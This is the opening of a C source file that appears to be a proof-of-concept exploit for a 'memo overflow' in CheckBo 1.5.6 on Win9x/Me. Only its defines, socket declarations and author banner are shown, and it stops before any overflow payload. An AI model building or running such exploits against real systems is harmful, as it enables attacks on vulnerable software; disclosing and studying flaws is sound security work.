#define VER "0.2" #define BYTES "ABCDEFGHIJ" #define PORT 12345
u_long resolv(char *host); void std_err(void);
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd, err, i;
setbuf(stdout, NULL);
printf("\n" "CheckBo 1.5.6 memo overflow (only for ChecBo that run on Win9x/Me) "VER"\n" "by Luigi Auriemma\n" "e-mail: aluigi@pivx.com\n" "web: http://aluigi.altervista.org\n" "\n");